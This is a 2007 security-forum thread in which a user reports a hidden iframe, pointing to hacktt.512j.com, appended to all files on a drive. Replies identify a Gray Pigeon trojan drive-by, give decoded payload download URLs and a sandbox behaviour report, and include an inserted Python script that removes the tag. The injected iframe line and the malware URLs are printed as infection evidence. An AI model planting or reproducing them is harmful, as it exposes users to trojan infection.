Rising Kaka Security Forum (瑞星卡卡安全论坛)

Some unknown virus has modified all the files on my D: drive
yn0879 - 2007-11-6 9:07:00
Rising never reported any virus, but every file on my D: drive has been modified. For example, the following was added to txt files:
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>
Looking at the exe files in a hex viewer, the code above has been appended to the end of them as well. Is there any repair tool?

[User system info] Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
孤独更可靠 - 2007-11-6 9:21:00
Yikes, that URL downloads Gray Pigeon (灰鸽子).

MS06-14 vulnerability, decimal-encoded.

After decoding:

http://hacktt.512j.com/nana/kdjj.exe

http://hacktt.512j.com/nana/exe.vbs


====================================================

[ DetectionInfo ]
    * Sandbox name: NO_MALWARE
    * Signature name: W32/Hupigon.dam
    * Compressed: NO

[ General information ]
    * Accesses executable file from resource section.
    * Creating several executable files on hard-drive.
    * File length:      293376 bytes.
    * MD5 hash: ab975258b4c0bdc6158152700614214f.

[ Changes to filesystem ]
    * Creates file C:\WINDOWS\DHOP.cn.
    * Creates file C:\WINDOWS\DHOP.DLL.

[ Changes to registry ]
    * Creates key "HKLM\System\CurrentControlSet\Services\Miarosoft Corpoystion".
    * Sets value "ImagePath"="C:\WINDOWS\DHOP.cn" in key "HKLM\System\CurrentControlSet\Services\Miarosoft Corpoystion".
    * Sets value "DisplayName"="DHOP Seystam Applia" in key "HKLM\System\CurrentControlSet\Services\Miarosoft Corpoystion".

[ Process/window information ]
    * Creates a mutex DHOP.cn.
    * Attempts to access service "Miarosoft Corpoystion".
    * Creates service "Miarosoft Corpoystion (DHOP Seystam Applia)" as "C:\WINDOWS\DHOP.cn".

[ Signature Scanning ]
    * C:\WINDOWS\DHOP.cn (293376 bytes) : no signature detection.
    * C:\WINDOWS\DHOP.DLL (246784 bytes) : no signature detection.


See if there is a tool for batch-deleting text.
~~~

无齿的猫 - 2007-11-6 9:31:00
So advanced... I can't follow it.
yn0879 - 2007-11-6 11:42:00
Batch text-deletion tools can only handle txt, html, c, h, asp and so on; if you use one to delete from an exe, the file is ruined.
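A byte-level cleanup for the situation described in this thread, added here as an example and not posted by any participant: it works on raw bytes, so it treats txt and exe files the same way and only cuts a run of the injected tag from the very end of a file. The function names and the `.infected` backup suffix are assumptions, as is the premise that the tag was only appended; removing the tag does not remove the service and files listed in the sandbox report.

```python
import re
import shutil
from pathlib import Path

# Injected tag exactly as quoted in the first post of the thread.
TAG = rb"<iframe src=http://hacktt.512j.com/nana/exe.htm width=0 height=0></iframe>"
# One or more copies at the very end of the file, separated only by CR/LF.
TAIL = re.compile(rb"(?:%s[\r\n]*)+\Z" % re.escape(TAG))
BACKUP_SUFFIX = ".infected"  # hypothetical name for the untouched copy


def strip_appended(data: bytes) -> tuple[bytes, int]:
    """Return (data without the trailing run of tags, number of tags removed)."""
    m = TAIL.search(data)
    if not m:
        return data, 0
    return data[: m.start()], m.group(0).count(TAG)


def clean_tree(root: Path, apply: bool = False) -> dict[str, tuple[int, int]]:
    """Map each affected file to (tags cut from the end, tags found elsewhere).

    With apply=False nothing is written. With apply=True the original is
    copied to <name>.infected before the truncated version is written.
    """
    report = {}
    files = sorted(p for p in root.rglob("*")
                   if p.is_file() and not p.name.endswith(BACKUP_SUFFIX))
    for path in files:
        data = path.read_bytes()
        cleaned, removed = strip_appended(data)
        elsewhere = cleaned.count(TAG)  # not at the end: reported, never edited
        if removed or elsewhere:
            report[str(path.relative_to(root))] = (removed, elsewhere)
        if apply and removed:
            shutil.copy2(path, path.with_name(path.name + BACKUP_SUFFIX))
            path.write_bytes(cleaned)
    return report


if __name__ == "__main__":
    import sys
    # Dry run by default; pass --apply as a second argument to rewrite files.
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for name, (cut, other) in clean_tree(target, "--apply" in sys.argv).items():
        print(f"{name}: {cut} appended tag(s), {other} elsewhere")
```

Files that report tags elsewhere than at the end are left untouched and need manual review or restoring from a known-good copy.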
mopery - 2007-11-6 11:47:00
http://www.vaid.cn/blog/read.php?27